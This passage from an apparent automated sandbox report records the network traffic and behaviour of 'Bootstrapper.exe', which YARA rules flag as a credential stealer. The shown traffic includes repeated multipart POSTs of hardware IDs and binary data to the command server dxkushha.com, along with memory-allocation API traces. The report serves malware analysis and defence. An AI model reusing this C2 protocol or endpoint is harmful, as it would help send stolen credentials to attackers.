2024-12-27 02:36:15 UTC	15331	OUT	Data Raw: 2d 2d 37 48 4d 32 41 51 50 31 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 38 30 30 32 35 34 31 32 34 46 42 41 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 37 48 4d 32 41 51 50 31 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 48 4d 32 41 51 50 31 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 37 48 4d 32 41 51 50 31 48 56 0d 0a 43 Data Ascii: --7HM2AQP1HVContent-Disposition: form-data; name="hwid"F25800254124FBA138ACDDE148F97B32--7HM2AQP1HVContent-Disposition: form-data; name="pid"2--7HM2AQP1HVContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--7HM2AQP1HVC
2024-12-27 02:36:15 UTC	2791	OUT	Data Raw: ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
2024-12-27 02:36:16 UTC	1119	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:36:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rars05shj73fhv8q1oldpa5nh4; expires=Mon, 21 Apr 2025 20:22:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WIHaQ1EUORAY1FafX4l1kesWL%2F8Fbuvpy1VIgYlrcLW8NRJUhC2hRhH1JV6hXuTzJOP8QDbPOmR9dWL5Ztt7rzn0eSQuUiKh1HNOB1PUQ7FfcxcuVsWf3eJjkzcnI4Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85ec041f2d0f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1476&rtt_var=610&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2829&recv_bytes=19072&delivery_rate=1715628&cwnd=231&unsent_bytes=0&cid=58c70205a5a31a24&ts=1702&x=0"
2024-12-27 02:36:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 02:36:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49775	104.21.80.1	443	5416	C:\Users\user\Desktop\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:36:18 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2A1X3JYWD4641FBF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: dxkushha.com
2024-12-27 02:36:18 UTC	8779	OUT	Data Raw: 2d 2d 32 41 31 58 33 4a 59 57 44 34 36 34 31 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 38 30 30 32 35 34 31 32 34 46 42 41 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 32 41 31 58 33 4a 59 57 44 34 36 34 31 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 41 31 58 33 4a 59 57 44 34 36 34 31 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 Data Ascii: --2A1X3JYWD4641FBFContent-Disposition: form-data; name="hwid"F25800254124FBA138ACDDE148F97B32--2A1X3JYWD4641FBFContent-Disposition: form-data; name="pid"2--2A1X3JYWD4641FBFContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4
2024-12-27 02:36:19 UTC	1121	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:36:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7v46u8j0cqmijcnsapenf99ll9; expires=Mon, 21 Apr 2025 20:22:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjYw9EliyXrlVzQXiI8AIHIwpHj%2FKvNwJ68Mi3c47f0YJK8Qk0VCG1Yqlr1m4RSXp1kQH%2Bk2uEA88dxNGmxE7FzYqIqxkwpECFAQHgnRoNQzsj3fK1P%2BmylYTdMJIY0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85ec176e8e42d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1589&rtt_var=616&sent=9&recv=15&lost=0&retrans=0&sent_bytes=2830&recv_bytes=9712&delivery_rate=1749550&cwnd=227&unsent_bytes=0&cid=13442d1b404637d4&ts=885&x=0"
2024-12-27 02:36:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 02:36:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49782	104.21.80.1	443	5416	C:\Users\user\Desktop\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:36:20 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2RNF2ZJJLTQP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20408 Host: dxkushha.com
2024-12-27 02:36:20 UTC	15331	OUT	Data Raw: 2d 2d 32 52 4e 46 32 5a 4a 4a 4c 54 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 38 30 30 32 35 34 31 32 34 46 42 41 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 32 52 4e 46 32 5a 4a 4a 4c 54 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 52 4e 46 32 5a 4a 4a 4c 54 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 32 52 4e 46 32 5a 4a Data Ascii: --2RNF2ZJJLTQPContent-Disposition: form-data; name="hwid"F25800254124FBA138ACDDE148F97B32--2RNF2ZJJLTQPContent-Disposition: form-data; name="pid"3--2RNF2ZJJLTQPContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--2RNF2ZJ
2024-12-27 02:36:20 UTC	5077	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-27 02:36:21 UTC	1117	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:36:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tsvgpa8sf8ltl4f2igegujtr0n; expires=Mon, 21 Apr 2025 20:23:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4X8Jt5JUQ0e2Eyy2L0f99umKxCjdxdiI7N8wNuF9g2gE3NOsgsuhdSx4sz7wPdd28w1uD9rXT2fhaQcz0V7RRd79NwQUuJ47eLSBhnVlvrWBHPTTWamxaAfCLIHbo8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85ec270a2e43ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=644&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21360&delivery_rate=1696687&cwnd=230&unsent_bytes=0&cid=3d5fe34d31ef0d2d&ts=978&x=0"
2024-12-27 02:36:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 02:36:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49788	104.21.80.1	443	5416	C:\Users\user\Desktop\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:36:23 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QU6DXMH6BWG9JUMV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1215 Host: dxkushha.com
2024-12-27 02:36:23 UTC	1215	OUT	Data Raw: 2d 2d 51 55 36 44 58 4d 48 36 42 57 47 39 4a 55 4d 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 38 30 30 32 35 34 31 32 34 46 42 41 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 51 55 36 44 58 4d 48 36 42 57 47 39 4a 55 4d 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 55 36 44 58 4d 48 36 42 57 47 39 4a 55 4d 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 Data Ascii: --QU6DXMH6BWG9JUMVContent-Disposition: form-data; name="hwid"F25800254124FBA138ACDDE148F97B32--QU6DXMH6BWG9JUMVContent-Disposition: form-data; name="pid"1--QU6DXMH6BWG9JUMVContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4
2024-12-27 02:36:24 UTC	1122	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:36:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sks2mevbtkgd91b7s8h7f7rl3f; expires=Mon, 21 Apr 2025 20:23:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gBPplwDJSroufP94Azm4xNPALj4PFJNG%2Bzz0ekVfTuecWuCHZUvgV%2BMcewijAhBuxp7GYp2En1aNbmc%2F2C02l3g%2BOuX55Oi1Aj6i5esiNnYGNCV86PuJ2P0o9uSlTFg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85ec3a2e730f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1620&rtt_var=690&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=2126&delivery_rate=1497435&cwnd=231&unsent_bytes=0&cid=dcdf80ada0780f0b&ts=829&x=0"
2024-12-27 02:36:24 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 02:36:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49794	104.21.80.1	443	5416	C:\Users\user\Desktop\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:36:26 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PJW7FN57LZBCQB0W8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1112 Host: dxkushha.com
2024-12-27 02:36:26 UTC	1112	OUT	Data Raw: 2d 2d 50 4a 57 37 46 4e 35 37 4c 5a 42 43 51 42 30 57 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 38 30 30 32 35 34 31 32 34 46 42 41 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 50 4a 57 37 46 4e 35 37 4c 5a 42 43 51 42 30 57 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 4a 57 37 46 4e 35 37 4c 5a 42 43 51 42 30 57 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 Data Ascii: --PJW7FN57LZBCQB0W8Content-Disposition: form-data; name="hwid"F25800254124FBA138ACDDE148F97B32--PJW7FN57LZBCQB0W8Content-Disposition: form-data; name="pid"1--PJW7FN57LZBCQB0W8Content-Disposition: form-data; name="lid"HpOoIh--2a727a03
2024-12-27 02:36:27 UTC	1121	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:36:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=12pogfs4ntgg5k1hqsp9j2ch4q; expires=Mon, 21 Apr 2025 20:23:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gINzzvpygUouy96lJdRKgMnt8MKqNvcfubTeNFMaZG1%2BHsJrTwy9UxONDMTxxCQwVdf4u6SPb%2BxNUO4zum1b6oE%2BxhWzDfrLSDfjV0VeYcjgE82BBXRwZWneBdKlZ5A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85ec481bfd42d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1844&min_rtt=1652&rtt_var=757&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2024&delivery_rate=1767554&cwnd=227&unsent_bytes=0&cid=e4af67e1bb5338c6&ts=1367&x=0"
2024-12-27 02:36:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 02:36:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49801	104.21.80.1	443	5416	C:\Users\user\Desktop\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:36:28 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 121 Host: dxkushha.com
2024-12-27 02:36:28 UTC	121	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 46 32 35 38 30 30 32 35 34 31 32 34 46 42 41 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=F25800254124FBA138ACDDE148F97B32
2024-12-27 02:36:29 UTC	1118	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:36:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rvseom0arkhuaec1715jec3ja6; expires=Mon, 21 Apr 2025 20:23:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ZEuKKknKq02suJgyx4vRmO7tYN3pKoQfXRR5ZbAcUUyQpyI7lSTyoZgzSFZmaNY%2BOPLMRMLAJ5P8HGHk3Ek9Vh%2BVXF4jItn8PlBACwO6jv2Kjur7AQ0kFEPREkgd1s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85ec592a008c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2043&min_rtt=2038&rtt_var=774&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1018&delivery_rate=1403846&cwnd=220&unsent_bytes=0&cid=e3d69ba0d5cecc87&ts=783&x=0"
2024-12-27 02:36:29 UTC	54	IN	Data Raw: 33 30 0d 0a 71 37 45 41 75 44 76 54 45 69 37 56 41 47 37 78 4a 43 43 34 6d 4a 42 32 5a 63 75 66 50 72 32 78 46 30 73 70 70 6e 69 7a 58 52 44 77 37 41 3d 3d 0d 0a Data Ascii: 30q7EAuDvTEi7VAG7xJCC4mJB2ZcufPr2xF0sppnizXRDw7A==
2024-12-27 02:36:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	21:34:59
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\Bootstrapper.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Bootstrapper.exe"
Imagebase:	0x720000
File size:	1'003'520 bytes
MD5 hash:	FF6C56326F0EE63CA9360576A7449FF5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2502138943.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2480224915.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	9.8%
Signature Coverage:	13.9%
Total number of Nodes:	772
Total number of Limit Nodes:	12

Executed Functions

Function 007BE6C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007BDFD0: LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 007BE16B

NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000002,00000000,00000000,00000000,082962C8,?,?,007BD9E1,?,00000000,?), ref: 007BE701
NtProtectVirtualMemory.NTDLL(000000FF,?,007BD9E1,00000000,00000000,00000000,00000000,082962C8,?,?,007BD9E1,?,00000000,?), ref: 007BE803

Strings

, xrefs: 007BE797

Memory Dump Source

Source File: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: MemoryProtectVirtual$LibraryLoad
String ID:
API String ID: 4159661263-3916222277
Opcode ID: 29f9e2d3866784fb39e4acce5980945244bac95dda44c2316337fe1a20b9e87d
Instruction ID: 92ba6d703af3c42d98fde13338597d1fd6d7556b964779ef4565c3e916891fdd
Opcode Fuzzy Hash: 29f9e2d3866784fb39e4acce5980945244bac95dda44c2316337fe1a20b9e87d
Instruction Fuzzy Hash: 1D412AB5D00209EBDB04CF94C985BFEBBB5FF58310F20815AE815AB381D7389A41DBA0

Function 007BE180 Relevance: 1.7, APIs: 1, Instructions: 162
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007BDFD0: LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 007BE16B

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00003000,00000004,00000000,00000000,6793C34C), ref: 007BE202

Memory Dump Source

Source File: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: c329ee17c0eff391a5dc2086750547225e65861cfc00dc49fadffb7d0c864216
Instruction ID: 5cbf584cbb06d1761b4be607a357b03210c12e43e8095bd16a0346fe8cc36440
Opcode Fuzzy Hash: c329ee17c0eff391a5dc2086750547225e65861cfc00dc49fadffb7d0c864216
Instruction Fuzzy Hash: A861F774A04209EFDB04DF94C895BFEBBB9FF48714F108559E911AB381E7789A81CB60

Function 007BE890 Relevance: .3, Instructions: 326
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

